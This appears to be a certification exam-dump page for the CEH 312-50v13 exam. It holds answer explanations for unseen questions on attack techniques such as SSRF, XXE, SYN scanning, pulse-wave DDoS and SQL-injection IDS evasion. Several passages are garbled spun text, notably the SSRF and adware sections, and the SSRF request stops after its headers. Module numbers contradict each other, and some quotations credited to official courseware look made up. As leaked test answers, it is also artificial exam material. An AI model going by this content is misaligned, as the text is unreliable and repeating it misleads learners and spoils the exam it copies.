ECCouncil 312-50v13 Dumps

CEH v13 discusses various credential extraction and authentication abuse techniques, including approaches that avoid LSASS memory due to modern protections like Credential Guard. The Internal Monologue technique is a specialized credential-harvesting approach that leverages the Windows SSPI authentication stack to coerce the local system into generating NetNTLM challenge-response hashes without requiring direct access to LSASS. This allows attackers to obtain legitimate NTLM responses entirely within the user’s security context. These captured responses can then be cracked offline using tools such as Hashcat. Unlike replay attacks (Option B), Internal Monologue is not about reusing captured traffic. Hash injection (Option C) requires possession of NT hashes and modifies authentication tokens, which does not occur here. Pass-the-ticket (Option D) targets Kerberos, not NTLM. Therefore, the correct technique is the Internal Monologue attack.

This scenario clearly aligns with a Pulse Wave DDoS attack, a sophisticated denial-of-service technique described in CEH v13 Network and Perimeter Hacking. Unlike traditional volumetric DDoS attacks that rely on sustained flooding, pulse wave attacks deliver short, extremely high-volume bursts of traffic, followed by periods of inactivity.

The defining characteristics described—intermittent spikes exceeding 300 Gbps, regular intervals (every 10 minutes), and temporary recovery—are hallmark indicators of pulse wave attacks. CEH v13 explains that attackers use this method to overwhelm server resources, trigger auto-scaling failures, exhaust mitigation thresholds, and evade detection systems that rely on sustained traffic baselines.

Option A is incorrect because UDP floods are continuous. Option B (HTTP GET flood) targets the application layer with sustained requests. Option C (PDoS) permanently damages hardware, which does not match the recurring pattern.

Pulse wave attacks are particularly effective against large platforms like streaming services because they:

Exploit elasticity limits of cloud infrastructure

Confuse rate-based detection systems

Cause repeated service degradation without long attack durations

CEH v13 emphasizes that pulse wave attacks are difficult to mitigate without adaptive, behavior-based DDoS protection. Therefore, Option D is the correct and CEH-aligned answer.

Comprehensive and Detailed Explanation:

A Denial-of-Service (DoS) attack aims to overwhelm a system or service with excessive requests, rendering it unavailable to legitimate users. It targets:

Bandwidth (e.g., flooding with traffic)

Resources (CPU, memory, or disk usage)

Applications (exploiting bugs that crash services)

From CEH v13 Courseware:

Module 9: Denial-of-Service Attacks

Incorrect Options:

B refers to brute-force attacks.

C mischaracterizes password cracking.

D describes impersonation or spoofing, not DoS.

Comprehensive and Detailed Explanation:

Fake antivirus (also known as scareware) tricks users into downloading malware disguised as legitimate antivirus software.

The best approach:

Google the product name and URL.

Check reputable forums, antivirus vendors, or security advisories.

Look for phishing warnings or reports of malware.

From CEH v13 Courseware:

Module 7: Social Engineering and Phishing Scams

Module 6: Malware Threats → Rogue Software

Comprehensive and Detailed Explanation:

IDS cannot easily detect malicious content in encrypted traffic. Since the payload is encrypted (e.g., HTTPS, SSL/TLS), it is unreadable without decryption.

Statement B is therefore FALSE.

From CEH v13 Courseware:

Module 13: IDS, Firewalls and Honeypots → Limitations of IDS

In CEH v13 Module 11: Hacking Wireless Networks, Kismet is introduced as a passive wireless sniffer and network detector used primarily on Linux systems.

Kismet passively listens for wireless beacons and data frames.

Can detect hidden SSIDs, rogue APs, and even wireless client behaviors.

Does not transmit any packets, making it stealthy and ideal for wireless reconnaissance.

Option Analysis:

A. Burp Suite: Used for web application testing, not wireless.

B. OpenVAS: Vulnerability scanner, not a packet sniffer.

C. tshark: CLI version of Wireshark, can analyze wired and wireless packets, but not wireless-specific or passive by default.

D. Kismet: Correct wireless packet analyzer for Linux.

Server-side request forgery (also called SSRF) is a net security vulnerability that allows an assaulter to induce the server-side application to make http requests to associate arbitrary domain of the attacker’s choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services among the organization’s infrastructure, or to external third-party systems.

Another type of trust relationship that often arises with server-side request forgery is where the application server is able to interact with different back-end systems that aren’t directly reachable by users. These systems typically have non-routable private informatics addresses. Since the back-end systems normally ordinarily protected by the topology, they typically have a weaker security posture. In several cases, internal back-end systems contain sensitive functionality that may be accessed while not authentication by anyone who is able to act with the systems.

In the preceding example, suppose there’s an body interface at the back-end url Here, an attacker will exploit the SSRF vulnerability to access the executive interface by submitting the following request:

POST /product/stock HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 118

Bob wants Alice to verify that the message hasn’t been tampered with. This is a use case for ensuring data integrity and authenticity. The process described matches the creation of a digital signature:

Bob computes a checksum (typically a cryptographic hash) of the message.

Then, he encrypts this checksum (hash) using his own private key.

Alice receives the message and decrypts the checksum using Bob’s public key.

If the decrypted checksum matches the hash she computes from the received message, she confirms the message’s integrity and authenticity.

This is a fundamental principle of digital signatures.

Incorrect Options:

A. Alice's private key is never used by others; it's confidential.

B. Encrypting with Alice’s public key ensures confidentiality, not authenticity.

D. Bob’s public key is used by the receiver to verify authenticity, not for encryption in this context.

Reference – CEH v13 Official Courseware:

Module 20: Cryptography

Section: “Digital Signatures”

Subsection: “Using Private Keys to Sign and Public Keys to Verify”

CEH Engage Lab: Email Signing and Verification

=

The CEH Footprinting and Reconnaissance module highlights Google Alerts as a key passive reconnaissance tool for monitoring changes in web content, news, and online mentions.

Option B is correct.

Option A is active engagement.

Option C aids anonymity but not monitoring.

Option D is illegal and unethical.

CEH strongly promotes automated alerting for competitive intelligence.

DNS zone transfers occur when a secondary name server (slave) checks the Start of Authority (SOA) record from the primary server. The serial number in the SOA indicates the version of the zone file.

If:

Primary SOA serial > Secondary SOA serial

→ Zone transfer is initiated by the secondary server to update its data.

From CEH v13:

Module 3: DNS Enumeration

Topic: Zone Transfers and SOA Logic

CEH v13 Study Guide states:

“A secondary name server periodically queries the primary name server for changes. If the serial number in the SOA record is higher on the primary, it indicates a zone update, and a zone transfer is triggered.”

Incorrect Options:

B: Reversed condition

C/D: Restarting services doesn’t necessarily trigger a transfer

E: TTL expiration affects caching, not zone transfer logic

This activity clearly indicates a TCP SYN scan, also known as a half-open scan, which is a commonly used stealth scanning technique discussed in CEH v13 Reconnaissance and Network Scanning. In a SYN scan, the attacker sends TCP SYN packets to target ports and observes the responses without completing the TCP three-way handshake.

If the port is open, the target responds with a SYN/ACK packet. The scanner then immediately sends a RST packet instead of the final ACK, leaving the connection half-open. This behavior allows attackers to identify open ports while minimizing log entries and reducing detection by security monitoring tools.

The absence of ACK packets in logs supports this explanation, as the handshake is never completed.

Other options are incorrect because:

XMAS scans send packets with multiple flags set.

SYN/ACK scans are primarily used for firewall rule discovery.

TCP Connect scans complete the full handshake and generate ACKs.

CEH v13 emphasizes that SYN scans are widely used because they balance accuracy and stealth, making them a preferred reconnaissance method for attackers.

In LM hashing (used in legacy Windows systems), passwords are split into two 7-character chunks. If a password is fewer than 8 characters, the second half is padded with nulls and hashed to a constant value.

That constant is:

AAD3B435B51404EE

Thus, the second half of the LM hash (the rightmost 16 characters) is always the same if the password is < 8 characters.

From CEH v13 Courseware:

Module 6: Malware Threats → LM Hash Characteristics

CEH v13 Study Guide states:

“If the password is less than 8 characters, the second half of the LM hash will always be ‘AAD3B435B51404EE’, indicating the hash belongs to a short password.”

Adware, or advertising supported computer code, is computer code that displays unwanted advertisements on your pc. Adware programs can tend to serve you pop-up ads, will modification your browser’s homepage, add spyware and simply bombard your device with advertisements. Adware may be a additional summary name for doubtless unwanted programs. It’s roughly a virulent disease and it’s going to not be as clearly malicious as a great deal of different problematic code floating around on the net. create no mistake concerning it, though, that adware has to return off of no matter machine it’s on. Not solely will adware be extremely annoying whenever you utilize your machine, it might additionally cause semipermanent problems for your device.

Adware a network users the browser to gather your internet browsing history so as to ’target’ advertisements that appear tailored to your interests. At their most innocuous, adware infections square measure simply annoying. as an example, adware barrages you with pop-up ads that may create your net expertise markedly slower and additional labor intensive.

The command in question:

wget 192.168.0.15 -q -S

wget is a command-line utility used to retrieve files via HTTP, HTTPS, or FTP.

-q (quiet mode): Suppresses output, except for errors.

-S: Displays the server response headers (even in quiet mode).

In this case, wget is being used to connect to the specified web server (192.168.0.15) and retrieve the HTTP response headers — such as the Server field (e.g., Apache, Nginx), HTTP status codes, and other metadata.

This is a classic example of banner grabbing — the process of capturing metadata (often from headers) to identify the software, version, or configuration of a service.

Incorrect Options:

A. Content enumeration would require directory brute-forcing tools like DirBuster or Gobuster.

C. DoS attacks require high volumes of traffic or specially crafted packets; wget with a single request does not perform flooding.

D. Downloading full site contents would involve options like -r (recursive) or --mirror, which are not used in this command.

Reference – CEH v13 Official Courseware:

Module 03: Scanning Networks

Section: “Banner Grabbing”

Tool Reference: wget, netcat, telnet, curl for banner enumeration

This refers to the CVSS (Common Vulnerability Scoring System), which CEH v13 identifies as the industry standard for vulnerability prioritization. A score of 9.8 indicates critical severity, combining metrics such as exploitability, impact, privileges required, and scope.

CVSS helps organizations prioritize remediation objectively, focusing resources on vulnerabilities with the highest business risk. It also allows consistent communication between technical and management teams.

Options B, C, and D misrepresent CVSS functionality. Therefore, Option A is correct.

In CEH v13 Module 13: Hacking Web Applications, this exact payload is an example of an XXE (XML External Entity) Attack.

XXE Attack:

Exploits the way XML parsers process DOCTYPE declarations.

The payload references a local file (/etc/passwd), allowing local file inclusion.

Can result in sensitive file disclosure, SSRF, or Denial of Service (DoS).

Option Clarification:

A. XXE: Correct – targets vulnerable XML parsers.

B. SQLi: Targets SQL databases with ' OR '1'='1-type injections.

C. IDOR: Insecure Direct Object Reference, not related to XML.

D. XSS: Cross-site scripting; this is XML-based, not JavaScript injection.

Web Application Threats - Watering Hole Attack In a watering hole attack, the attacker identifies the kinds of websites a target company/individual frequently surfs and tests those particular websites to identify any possible vulnerabilities. Attacker injects malicious script/code into the web application that can redirect the webpage and download malware onto the victim machine. (P.1797/1781)

In CEH v13 Module 03: Scanning Networks, stealth scanning refers to a method of scanning that avoids detection by not completing the TCP handshake.

-sS = TCP SYN scan (Stealth scan)

Sends SYN packet.

If SYN-ACK is returned, the port is open; then a RST is sent back instead of completing handshake.

Harder to detect via IDS/IPS.

Option Analysis:

A. -sM: TCP Maimon scan (rarely used).

B. -sU: UDP scan.

C. -sS: Stealth SYN scan.

D. -sT: TCP Connect scan (not stealthy).

Operational Threat Intelligence provides insights into specific attacker methodologies, motivations, and campaigns. It involves gathering contextual information from real-world attacks, open-source intelligence (OSINT), social media, dark web forums, chat rooms, and human intelligence (HUMINT).

As per CEH v13 Official Courseware:

Operational intelligence is primarily used by security teams to anticipate specific incoming attacks.

It helps provide actionable information such as:

Who is attacking?

Why are they attacking?

What methods are they using?

What infrastructure is involved?

Incorrect Options:

A. Strategic Threat Intelligence is high-level, focusing on long-term trends and business risks.

B. Tactical Threat Intelligence is focused on TTPs (Tactics, Techniques, and Procedures) of known threats, primarily for defenders and analysts.

D. Technical Threat Intelligence includes IoCs like IPs, hashes, and URLs, often short-lived and used for detection systems.

Reference – CEH v13 Official Courseware:

Module 01: Introduction to Ethical Hacking

Section: "Types of Threat Intelligence"

Table: “Strategic vs Tactical vs Operational vs Technical Intelligence”

=

Risk assessment is a key process in security management that identifies, evaluates, and prioritizes risks to organizational operations and assets. It considers various controls and safeguards to mitigate those risks.

Administrative safeguards are part of the components used in risk assessments and include:

Policies

Procedures

Training

Security awareness programs

Incident response planning

From CEH v13:

Module 1: Introduction to Ethical Hacking

Module 20: Cryptography (as it discusses risk management and governance)

Topic: Security Controls and Risk Management Frameworks

CEH v13 Official Courseware states:

“Administrative controls, also known as administrative safeguards, form a critical component of risk assessments. These include documented security policies, user training, security audits, and incident response plans that help an organization manage and reduce risks.”

Incorrect Options:

B. Physical security is a type of safeguard but not typically referred to as a "component" of a risk assessment itself.

C. DMZ (Demilitarized Zone) is a network architecture concept, not a risk assessment component.

D. Logical interface refers to system architecture and network segmentation—not risk assessment methodology.

White Hat Hacking is defined in CEH v13 as ethical hacking performed with explicit authorization to identify and remediate vulnerabilities. White hat hackers operate within legal frameworks and contractual agreements.

Grey hats act without permission but without malicious intent. Black hats conduct illegal attacks. Blue hats are external testers invited to find bugs before product release.

Thus, Option C is correct.

In CEH v13 Module 06: Malware Threats, the Cyber Kill Chain is broken down into its seven stages:

Reconnaissance

Weaponization

Delivery

Exploitation

Installation

Command & Control

Actions on Objectives

Step 3 – Delivery:

Refers to the transmission of the malicious payload to the victim.

Can occur through email, web downloads, USB drives, etc.

Correct Example:

A. “An intruder sends a malicious attachment via email to a target” — This is delivery.

Other Options:

B. Weaponization

C. Exploitation

D. Installation

Whitelist validation (also known as allowlist validation) is a robust defensive strategy where only pre-approved input formats are accepted. This includes:

Restricting input to specific data types (e.g., integer, string)

Limiting size, format, or allowed characters

Accepting only expected values (e.g., country codes, age ranges)

This practice is highly effective in mitigating SQL injection and other input-based attacks.

Incorrect Options:

A. Output encoding prevents XSS by encoding output but doesn't validate input.

B. Enforcing least privilege is an access control principle.

D. Blacklist validation is less secure and attempts to block known bad inputs, which may be bypassed.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Input Validation and SQL Injection Mitigation”

Subsection: “Whitelist vs Blacklist Input Validation”

=

This scenario describes Differential Cryptanalysis, a powerful cryptanalytic technique covered in CEH v13 Cryptography. Differential cryptanalysis focuses on analyzing how small changes in plaintext input affect the resulting ciphertext output, with the goal of uncovering patterns related to the secret encryption key.

CEH v13 explains that symmetric algorithms rely on complex transformations—such as substitution and permutation—to obscure relationships between plaintext and ciphertext. However, in some algorithms, predictable differences may propagate through encryption rounds in a way that reveals statistical biases. By carefully selecting pairs of plaintext inputs with controlled differences and comparing the resulting ciphertexts, attackers can infer information about intermediate states and eventually the encryption key.

This method does not attempt every possible key (brute force), nor does it rely on execution timing or system performance metrics (timing attacks). It also differs from chosen-ciphertext attacks, which involve submitting chosen ciphertexts for decryption rather than observing encryption behavior.

Differential cryptanalysis was instrumental in breaking early block ciphers and is a key reason why modern algorithms like AES are designed with resistance to differential attacks. CEH v13 emphasizes that understanding this attack is critical for evaluating the strength of symmetric encryption algorithms and their internal structure.

Therefore, Option A accurately describes the technique being employed.

This scenario demonstrates SMTP Enumeration, a classic enumeration technique described in CEH v13 Network Enumeration. SMTP servers may expose commands such as VRFY, EXPN, and RCPT TO, which can be abused to validate user accounts.

When these commands are enabled without restriction, attackers can enumerate valid usernames without authentication. The Nmap script used explicitly leverages these commands, confirming the misconfiguration.

Option B is incorrect because authentication is not bypassed. Option C concerns DNS routing, not user enumeration. Option D relates to encryption, not enumeration capability.

CEH v13 strongly recommends disabling or restricting SMTP user verification commands. Thus, Option A is correct.

Scammers often impersonate legitimate organizations using free email services like @yahoo.com. "Yahoo Bank" is not a legitimate institution, and a real financial entity would use an official domain (e.g., @yahoobank.com). This is a textbook phishing/smishing attempt.

Reference – CEH v13 Official Study Guide:

Module 9: Social Engineering

Quote:

“Attackers often use free email services and impersonate authority figures to trick users. Always verify the sender’s domain and context.”

Incorrect Options:

B. Irrelevant—legitimate people may be unknown too.

C. Responding increases risk.

D. It is not from a verified organization.

=

In CEH v13 Information Security and Ethical Hacking Overview, a penetration tester is defined as a trusted, authorized security professional hired to simulate real-world attacks in order to identify and exploit vulnerabilities with explicit permission.

The primary objectives of a penetration tester are:

Identify weaknesses in systems, networks, and applications

Demonstrate real-world impact of vulnerabilities

Help organizations improve their security posture

Unlike malicious hackers (Option A) or malware authors (Options B and D), penetration testers operate under strict legal and ethical guidelines, following scopes of engagement and reporting findings responsibly.

CEH v13 emphasizes that penetration testing is proactive defense, not crime. Therefore, Option C accurately defines the role.

Packet fragmentation is a well-documented IDS evasion technique in CEH v13 Network and Perimeter Hacking. Attackers fragment packets to evade detection by overwhelming or confusing intrusion detection systems, especially those that rely on simple pattern matching.

CEH v13 explains that anomaly-based IDS systems are particularly effective against evasion techniques like packet fragmentation because they analyze deviations from normal network behavior, rather than relying on static signatures. Fragmented packets often create unusual traffic patterns, abnormal packet sizes, or irregular reassembly behavior, which anomaly-based systems are designed to detect.

Signature-based IDS solutions struggle against fragmentation because attackers can split malicious payloads across multiple packets in ways that bypass predefined signatures. Rejecting all fragmented packets (Option C) is impractical and could disrupt legitimate network communication, as fragmentation is a normal part of TCP/IP networking.

Recognizing regular intervals (Option A) is unreliable, as attackers can randomize packet timing. CEH v13 clearly recommends anomaly-based detection to counter advanced evasion techniques.

Thus, Option B is the most effective and CEH-aligned IDS configuration.

ARP (Address Resolution Protocol) spoofing/poisoning is a common attack in which an attacker sends falsified ARP messages to associate their MAC address with the IP address of another host. To defend against ARP spoofing:

A. Port Security: Limits the number of MAC addresses per port; prevents MAC flooding and spoofing.

B. ARPwatch: Monitors ARP traffic and alerts on unusual changes.

D. Static ARP Entries: Prevent ARP responses from overwriting MAC-IP mappings, effective in small networks.

From CEH v13 Official Courseware:

Module 8: Sniffing

Module 11: Session Hijacking

Module 20: Network Security

Incorrect Options:

C: Firewalls operate at Layer 3+; ARP is a Layer 2 protocol, so firewalls don’t prevent ARP spoofing.

E: Static IP addresses do not prevent ARP poisoning.

The base metric represents the inherent qualities of a vulnerability, according to the Common Vulnerability Scoring System (CVSS). CVSS is a framework that numerically characterizes the severity of software vulnerabilities between the range of 0-10. CVSS consists of three metric groups: Base, Temporal, and Environmental. The base metric group captures the characteristics of a vulnerability that are constant over time and across user environments. The base metric group consists of six sub-metrics: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, and Impact. The impact sub-metric further consists of three sub-metrics: Confidentiality, Integrity, and Availability. The base metric group produces a score ranging from 0 to 10, which reflects the intrinsic and fundamental properties of a vulnerability12.

The other options are not correct for the following reasons:

A. Temporal metric represents the inherent qualities of a vulnerability: This option is incorrect because the temporal metric group captures the characteristics of a vulnerability that change over time due to events external to the vulnerability. The temporal metric group consists of three sub-metrics: Exploit Code Maturity, Remediation Level, and Report Confidence. The temporal metric group modifies the base score to reflect the current state of the vulnerability, such as the availability of exploit code, the existence of patches or workarounds, and the degree of verification of the vulnerability report12.

C. Environmental metric involves the features that change during the lifetime of the vulnerability: This option is incorrect because the environmental metric group captures the characteristics of a vulnerability that are relevant and unique to a user’s environment. The environmental metric group consists of three sub-metrics: Modified Attack Vector, Modified Attack Complexity, and Modified Privileges Required. The environmental metric group also allows the user to assign importance values to the impact sub-metrics: Confidentiality Requirement, Integrity Requirement, and Availability Requirement. The environmental metric group modifies the base and temporal scores to reflect the impact of the vulnerability on the user’s specific environment, such as the network configuration, the security objectives, and the asset value12.

D. Temporal metric involves measuring vulnerabilities based on a specific environment or implementation: This option is incorrect because the temporal metric group does not involve measuring vulnerabilities based on a specific environment or implementation, but rather on the factors that change over time due to events external to the vulnerability. The environmental metric group, not the temporal metric group, involves measuring vulnerabilities based on a specific environment or implementation, as explained in option C.

Split DNS (also known as Split-Horizon DNS) is a configuration where internal users and external users receive different DNS responses. Typically, one DNS server resides in the DMZ for public access, and another is inside the network for internal name resolution.

???? Reference – CEH v13 Official Study Guide, Module 9: System Hacking / Perimeter Security

“Split DNS allows different DNS records to be presented based on whether the requester is from inside or outside the organization’s network.”

❌ Incorrect options:

A. DynDNS is a dynamic DNS provider.

B. DNS Scheme is a non-standard term.

C. DNSSEC is a security extension for DNS, not a deployment model.

This question shows a classic example of an IDOR vulnerability. Rob substitutes Ned's name in the "name" parameter and if the developer has not fixed this vulnerability, then Rob will gain access to Ned's account. Below you will find more detailed information about IDOR vulnerability.

Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. For example, an IDOR vulnerability would happen if the URL of a transaction could be changed through client-side user input to show unauthorized data of another transaction.

Most web applications use simple IDs to reference objects. For example, a user in a database will usually be referred to via the user ID. The same user ID is the primary key to the database column containing user information and is generated automatically. The database key generation algorithm is very simple: it usually uses the next available integer. The same database ID generation mechanisms are used for all other types of database records.

The approach described above is legitimate but not recommended because it could enable the attacker to enumerate all users. If it’s necessary to maintain this approach, the developer must at least make absolutely sure that more than just a reference is needed to access resources. For example, let’s say that the web application displays transaction details using the following URL:

A malicious hacker could try to substitute the id parameter value 74656 with other similar values, for example:

The 74657 transaction could be a valid transaction belonging to another user. The malicious hacker should not be authorized to see it. However, if the developer made an error, the attacker would see this transaction and hence we would have an insecure direct object reference vulnerability.

In CEH v13 Module 09: Social Engineering, spear-phishing is described as a targeted email-based attack in which malicious actors craft highly personalized emails to specific individuals within an organization.

Characteristics from the scenario:

The attacker sends a fraudulent email to an employee.

The email contains a malicious attachment.

Once opened, malware is installed, targeting ICS/SCADA components.

The attack spreads and ultimately damages industrial systems.

This is a classic spear-phishing attack used as the initial infection vector in Advanced Persistent Threats (APT) targeting industrial control systems.

Why Others Are Incorrect:

B. SMiShing: SMS-based phishing; not email-related.

C. Reconnaissance: Pre-attack information gathering, not execution.

D. HMI-based attack: Targets Human-Machine Interface devices, but that’s not how the attack started here.

PGP (Pretty Good Privacy), SSL (Secure Sockets Layer), and IKE (Internet Key Exchange) use Public Key Cryptography for secure communication. They utilize:

Public and private key pairs

Asymmetric encryption for key exchange

Symmetric encryption for data confidentiality (after key exchange)

These protocols ensure secure data transfer over insecure networks.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“Public key cryptography uses asymmetric key pairs for encryption and authentication. Protocols like PGP, SSL/TLS, and IKE rely on this to exchange keys and establish trust.”

Incorrect Options:

A & D. Digest/hash algorithms (e.g., MD5, SHA) ensure integrity, not encryption

B. Secret key refers to symmetric encryption, which is used after the public key exchange, not as the basis for these protocols

In CEH v13 Module 04: Enumeration, identifying services based on well-known port numbers is foundational for enumeration and scanning activities.

Port 21/TCP is assigned to the File Transfer Protocol (FTP).

FTP is a standard protocol used to upload, download, and manage files on a remote server.

During enumeration, open FTP ports can be probed for:

Anonymous login

Banner grabbing

Directory traversal vulnerabilities

Option Clarification:

A. BGP: Runs on TCP port 179.

C. NFS: Commonly uses port 2049.

D. RPC: Dynamically uses multiple ports.

Correct answer is B. FTP (port 21).

DNS hijacking occurs when attackers manipulate DNS responses to redirect traffic to malicious servers. CEH v13 clearly identifies DNSSEC (Domain Name System Security Extensions) as the primary defense against such attacks.

DNSSEC adds cryptographic signatures to DNS records, enabling clients to verify authenticity and integrity of DNS responses. Without DNSSEC, attackers can spoof DNS responses even if servers are fully patched.

Changing IP addresses and using LAMP do not address DNS trust. Patching is essential but does not prevent DNS spoofing.

CEH v13 explicitly recommends DNSSEC for preventing cache poisoning and DNS hijacking attacks, making Option C the correct answer.

Windows TTL 128, Linux TTL 64, OpenBSD 255 ...

Time to Live (TTL) represents to number of 'hops' a packet can take before it is considered invalid. For Windows/Windows Phone, this value is 128. This value is 64 for Linux/Android.

Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization’s perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.

Expanding your network capabilities are often done well using wireless networks, but it also can be a source of harm to your data system . Deficiencies in its implementations or configurations can allow tip to be accessed in an unauthorized manner.This makes it imperative to closely monitor your wireless network while also conducting periodic Wireless Network assessment.

It identifies flaws and provides an unadulterated view of exactly how vulnerable your systems are to malicious and unauthorized accesses.

Identifying misconfigurations and inconsistencies in wireless implementations and rogue access points can improve your security posture and achieve compliance with regulatory frameworks.

The Certified Ethical Hacker (CEH) Cloud Computing module emphasizes that serverless environments rely heavily on granular permission models. Attacks involving compromised APIs often succeed because functions are granted excessive privileges.

Option D is correct because enforcing function-level permissions and the principle of least privilege directly limits what a compromised function can execute. CEH documentation states this is the primary defense against serverless abuse.

Option A is beneficial but reactive.

Option B focuses on SaaS governance rather than FaaS execution control.

Option C provides visibility but does not directly prevent privilege misuse.

CEH highlights identity and access management (IAM) as critical in serverless security.

DHCP starvation is a network-level attack in which an attacker sends a massive number of DHCPDISCOVER requests, each appearing to originate from a different MAC address. CEH courseware explains that DHCP servers assign IP leases based on unique MAC addresses, and when the lease pool is exhausted, legitimate clients are unable to obtain valid IP configurations. This disrupts network connectivity and can serve as a precursor to deploying a rogue DHCP server, enabling further attacks such as traffic redirection or credential interception. DHCP starvation is different from ARP spoofing, which manipulates MAC–IP mappings, or DNS poisoning, which corrupts domain resolution. Rogue DHCP relay attacks involve forwarding DHCP packets to unauthorized servers, not depleting leases. The scenario described—rapid MAC address spoofing and exhaustion of DHCP leases—matches the precise definition of DHCP starvation as documented in CEH materials.

Comprehensive and Detailed Explanation From CEH v13 Guide:

Vulnerability identification is the step in the risk assessment process where security flaws or weaknesses are identified in existing systems, policies, or procedures.

CEH v13 Reference:

Module 5: Vulnerability Assessment – Risk Assessment Concepts

“Vulnerability identification is the process of discovering existing flaws and weaknesses in systems or processes that may be exploited.”

=

The Mirai malware primarily targets Internet of Things (IoT) devices with weak or default credentials. Once infected, these devices become part of a botnet that the attacker controls remotely. The primary use of Mirai botnets is to perform Distributed Denial of Service (DDoS) attacks.

DDoS attacks flood a target (server, application, or network) with massive traffic, overwhelming resources and causing service outages.

Mirai gained infamy after being used in large-scale DDoS attacks, including against DNS provider Dyn, which caused widespread internet outages.

Incorrect Options:

A. MITM attacks involve intercepting communications.

B. Birthday attacks are cryptographic hash collision techniques.

D. Password attacks refer to credential brute-forcing; although Mirai uses default credentials, its main attack vector is DDoS.

Reference – CEH v13 Official Courseware:

Module 18: IoT and OT Hacking

Section: “IoT Malware”

Subsection: “Mirai Botnet and Real-World Attacks”

CEH Engage: IoT Botnet Simulation

=

WPA2-Enterprise networks authenticate clients through 802.1X using a RADIUS server. A common attack method described in CEH training is to create an evil-twin access point broadcasting the same SSID as the legitimate one. Combined with de-authentication frames, clients are forced off the real AP and automatically reconnect to the stronger rogue AP. This allows the attacker to capture authentication exchanges for later misuse, including credential harvesting or EAP-based downgrade attacks.

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. (Wikipedia)

NB: The virus Melissa is a well-known macro virus we could find attached to word documents.

The hacker could have used the technique of manipulating white spaces in SQL queries to bypass signature detection. This technique involves inserting, removing, or replacing white spaces in SQL queries with other characters or symbols that are either ignored or interpreted as white spaces by the SQL engine, but not by the signature-based IDS. This way, the hacker can alter the appearance of the query and evade the pattern matching of the IDS, while preserving the functionality and logic of the query. For example, the hacker could replace the space character with a tab character, a newline character, a comment symbol, or a URL-encoded value, such as %2012.

The other options are not correct for the following reasons:

A. Utilizing the char encoding function to convert hexadecimal and decimal values into characters that pass-through SQL engine parsing: This option is not feasible because the char encoding function is not supported by all SQL engines, and it may not be able to convert all hexadecimal and decimal values into valid characters. Moreover, the char encoding function may not be able to bypass the signature detection of the IDS, as it may still match the keywords or syntax of the SQL query3.

B. Using the URL encoding method to replace characters with their ASCII codes in hexadecimal form: This option is not effective because the URL encoding method is not applicable to SQL queries, as it is designed for encoding special characters in URLs. The URL encoding method may not be able to replace all characters with their ASCII codes, and it may not be able to preserve the functionality and logic of the SQL query. Furthermore, the URL encoding method may not be able to evade the signature detection of the IDS, as it may still match the keywords or syntax of the SQL query4.

C. Implementing sophisticated matches such as “OR ‘john’ = john" in place of classical matches like “OR 1-1”: This option is not advanced because it is a common and basic SQL injection technique that does not involve any evasion or obfuscation. This technique involves injecting a logical expression that is always true, such as “OR ‘john’ = john” or “OR 1-1”, to bypass the authentication or authorization checks of the SQL query. However, this technique may not be able to bypass the signature detection of the IDS, as it may easily match the keywords or syntax of the SQL query.

Outdated encryption protocols such as SSL 3.0 and TLS 1.0 contain numerous cryptographic weaknesses, making them susceptible to downgrade attacks, cipher-suite vulnerabilities, and interception. CEH explains that weak SSL/TLS configurations expose encrypted traffic to man-in-the-middle attacks because attackers can exploit vulnerabilities such as BEAST, POODLE, or weak ciphers to decrypt or manipulate data in transit. These flaws compromise confidentiality and integrity, allowing attackers to observe login credentials, session identifiers, or sensitive information. XSS and SQL injection exploit entirely different web vulnerabilities unrelated to encryption strength. Brute-forcing SSL handshakes is computationally infeasible and not relevant. Therefore, a MitM attack targeting the outdated protocol is the most effective exploitation method.

Many network and system administrators don't pay enough attention to system clock accuracy and time synchronization. Computer clocks can run faster or slower over time, batteries and power sources die, or daylight-saving time changes are forgotten. Sure, there are many more pressing security issues to deal with, but not ensuring that the time on network devices is synchronized can cause problems. And these problems often only come to light after a security incident.

If you suspect a hacker is accessing your network, for example, you will want to analyze your log files to look for any suspicious activity. If your network's security devices do not have synchronized times, the timestamps' inaccuracy makes it impossible to correlate log files from different sources. Not only will you have difficulty in tracking events, but you will also find it difficult to use such evidence in court; you won't be able to illustrate a smooth progression of events as they occurred throughout your network.

A digital signature is created by hashing the document and encrypting that hash with the sender’s private key. Since the hash is specific to the original content, any change to the document invalidates the signature, making it non-transferable to another document.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“Digital signatures are based on hashing the document and signing the digest with the private key. This makes each signature unique to the document and ensures tamper resistance.”

Incorrect Options:

B. Incorrect — signature is tied to one document.

C. Hashes are not plain; they are encrypted.

D. Keys can be reused, but signatures are document-specific.

In CEH v13 Module 02: Footprinting and Reconnaissance, the OSINT Framework is introduced as a collection of free, open-source tools and resources to aid ethical hackers in passive reconnaissance.

Key Features of OSINT Framework:

Web-based visual tool that maps out links to open-source intelligence tools.

Allows collection of emails, domains, usernames, IPs, social media data, and more.

Focuses on passive footprinting to avoid detection.

Option Clarification:

A. WebSploit Framework: Used for man-in-the-middle attacks and web vulnerabilities.

B. Browser Exploitation Framework (BeEF): Browser-focused attack tool.

C. OSINT Framework: Correct — open-source intelligence and reconnaissance.

D. SpeedPhish Framework: Phishing simulation tool, not used for passive information gathering.

CEH v13 identifies ARP spoofing/poisoning as a primary MitM technique in local networks. In such attacks, a single IP address maps to multiple MAC addresses, indicating ARP table manipulation.

